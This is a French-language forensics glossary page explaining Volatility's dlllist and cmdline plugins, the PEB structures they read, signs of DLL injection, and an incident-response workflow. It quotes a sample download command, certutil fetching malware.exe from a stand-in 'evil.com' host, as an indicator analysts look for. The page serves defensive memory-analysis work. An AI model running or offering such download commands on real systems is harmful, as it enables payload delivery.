Volatility dlllist cmdline
forensicsDéfinition
Les plugins dlllist et cmdline de Volatility permettent d'analyser en détail les processus identifiés lors de l'analyse mémoire. dlllist (windows.dlllist dans Volatility 3) liste toutes les DLLs chargées par chaque processus, révélant les injections de bibliothèques malveillantes. cmdline (windows.cmdline) affiche la ligne de commande complète avec laquelle chaque processus a été lancé, souvent révélatrice des intentions et techniques d'attaque. windows.dlllist analyse la structure PEB (Process Environment Block) de chaque processus pour extraire la liste des modules (DLLs) chargés dans le Load Order Module List. Pour chaque module, il affiche le nom, l'adresse de base en mémoire, le chemin complet sur le disque, et la taille. Les anomalies à rechercher incluent : des DLLs chargées depuis des chemins temporaires (TEMP, AppData\Local\Temp) plutôt que System32/SysWOW64, des noms similaires à des DLLs légitimes (ntdll_.dll, kernel32x.dll), des DLLs sans chemin correspondant sur le disque (indicatif de Reflective DLL Injection), et des modules avec une base d'adresse dans une plage inhabituelle. windows.cmdline extrait les arguments de ligne de commande depuis le PEB de chaque processus. Pour les malwares et les TTPs d'attaque, la ligne de commande est souvent très révélatrice : des arguments PowerShell encodés en base64 (-EncodedCommand, -enc), des chemins vers des fichiers temporaires suspects, des connexions réseau directes (certutil -urlcache -f http://evil.com/malware.exe), ou des options inhabituelles pour des processus systèmes (cmd.exe /c secret_command). La corrélation de dlllist et cmdline avec le résultat de pstree permet de construire une image complète de chaque processus suspect : d'où vient-il (parent), avec quels arguments a-t-il été lancé (cmdline), et quelles bibliothèques a-t-il chargées (dlllist). Cette vue combinée est essentielle pour comprendre la chaîne d'exécution d'une attaque.
Fonctionnement
windows.dlllist accède au PEB (Process Environment Block, pointé par FS:[0x30] ou GS:[0x60]) de chaque processus puis parcourt la structure PEB.Ldr (LoaderData) qui maintient trois listes doublement chaînées des modules (InLoadOrder, InMemoryOrder, InInitializationOrder). cmdline extrait PEB.ProcessParameters.CommandLine, une UNICODE_STRING pointant vers les arguments passés à CreateProcess.
Application DFIR
Workflow : 1) vol.py windows.dlllist --pid [PID suspect] → chercher DLLs en TEMP ou sans fichier disque, 2) vol.py windows.cmdline → PowerShell encodé, certutil download, wscript en -e, 3) Pour les DLLs injectées sans fichier disque : vol.py windows.malfind pour identifier les régions injectées, puis vol.py windows.dumpfiles pour extraire les fichiers correspondants. Comparer les DLLs présentes avec les listes de modules attendus pour chaque processus système.
Outils
Volatility 3 : vol.py -f dump.mem windows.dlllist [--pid PID], vol.py -f dump.mem windows.cmdline [--pid PID]. Volatility 2 : vol.py --profile=... dlllist -p [PID], cmdscan, consoles. Détection injection : windows.malfind (régions PE injectées), pe-sieve (live). Analyse Base64 : CyberChef (From Base64 → décodage commandes PowerShell).
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h